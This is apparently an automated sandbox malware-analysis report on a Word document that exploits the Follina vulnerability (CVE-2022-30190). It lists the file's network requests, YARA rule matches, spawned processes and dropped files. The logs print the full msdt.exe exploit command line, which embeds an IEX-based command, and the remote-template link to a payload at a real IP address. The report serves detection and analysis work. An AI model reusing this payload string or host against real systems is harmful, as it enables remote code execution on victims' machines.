Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://officeapps.live.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://onedrive.live.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://osi.office.net
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://otelrules.azureedge.net
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://outlook.office.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://outlook.office.com/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://outlook.office365.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://roaming.edog.
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://settings.outlook.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://tasks.office.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://wus2.contentsync.
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: global traffic HTTP traffic detected: GET /side.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 194.34.232.147Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /side.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 194.34.232.147If-Modified-Since: Mon, 30 May 2022 20:51:09 GMTIf-None-Match: "1a76-5e040d0ca4940-gzip"Connection: Keep-Alive
Source: document.xml.rels, type: SAMPLE Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: document.xml.rels, type: SAMPLE Matched rule: EXPL_CVE_2021_40444_Document_Rels_XML date = 2021-09-10, author = Jeremy Brown / @alteredbytes, description = Detects indicators found in weaponized documents that exploit CVE-2021-40444, reference = https://twitter.com/AlteredBytes/status/1435811407249952772
Source: 00000007.00000002.556563840.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
Source: 00000007.00000002.553310799.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
Source: 00000007.00000002.553825073.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
Source: 00000007.00000002.553669384.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
Source: Process Memory Space: msdt.exe PID: 6896, type: MEMORYSTR Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\side[1].htm, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\side[1].htm, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\50A7EA9A.htm, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BEF29DB8.htm, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: DiagPackage.dll.mui.7.dr Static PE information: No import functions for PE file found
Source: DiagPackage.dll.7.dr Static PE information: No import functions for PE file found
Source: DiagPackage.dll.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Section loaded: sfc.dll Jump to behavior
Source: 5YMh6S8QVr.docx Virustotal: Detection: 50%
Source: 5YMh6S8QVr.docx Metadefender: Detection: 31%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qjydgt0v\qjydgt0v.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EF0.tmp" "c:\Users\user\AppData\Local\Temp\qjydgt0v\CSCF686346A26FD430292162641BEBDEE9.TMP"
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\k20rbpet\k20rbpet.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4ECF.tmp" "c:\Users\user\AppData\Local\Temp\k20rbpet\CSCE7B22EE4778740AF867136D9AB1FA733.TMP"
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gq51tajz\gq51tajz.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8F43.tmp" "c:\Users\user\AppData\Local\Temp\gq51tajz\CSC3BD1B1444E1C48ADB45F58F4D21E85A7.TMP"
Source: unknown Process created: C:\Windows\SysWOW64\calc.exe C:\Windows\system32\calc.exe
Source: unknown Process created: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gicpsj5r\gicpsj5r.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD768.tmp" "c:\Users\user\AppData\Local\Temp\gicpsj5r\CSCDCDF82AFC84E4F03B728563353CFAD3C.TMP"
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EF0.tmp" "c:\Users\user\AppData\Local\Temp\qjydgt0v\CSCF686346A26FD430292162641BEBDEE9.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4ECF.tmp" "c:\Users\user\AppData\Local\Temp\k20rbpet\CSCE7B22EE4778740AF867136D9AB1FA733.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8F43.tmp" "c:\Users\user\AppData\Local\Temp\gq51tajz\CSC3BD1B1444E1C48ADB45F58F4D21E85A7.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD768.tmp" "c:\Users\user\AppData\Local\Temp\gicpsj5r\CSCDCDF82AFC84E4F03B728563353CFAD3C.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32 Jump to behavior
Source: 5YMh6S8QVr.docx.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\5YMh6S8QVr.docx
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{FEFE458A-7D18-4DC4-A686-3B5A1C6E649B} - OProcSessId.dat Jump to behavior
Source: classification engine Classification label: mal88.expl.evad.winDOCX@21/38@0/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 5YMh6S8QVr.docx Initial sample: OLE zip file path = word/media/image2.wmf
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qjydgt0v\qjydgt0v.cmdline
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\k20rbpet\k20rbpet.cmdline
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gq51tajz\gq51tajz.cmdline
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gicpsj5r\gicpsj5r.cmdline

Persistence and Installation Behavior

barindex
Source: document.xml.rels Extracted files from sample: mhtml:http://194.34.232.147/side.html!x-usc:http://194.34.232.147/side.html
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\gicpsj5r\gicpsj5r.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_390ebd66-1039-4677-8a3d-dc2b831785c8\DiagPackage.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\qjydgt0v\qjydgt0v.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_390ebd66-1039-4677-8a3d-dc2b831785c8\en-US\DiagPackage.dll.mui Jump to dropped file
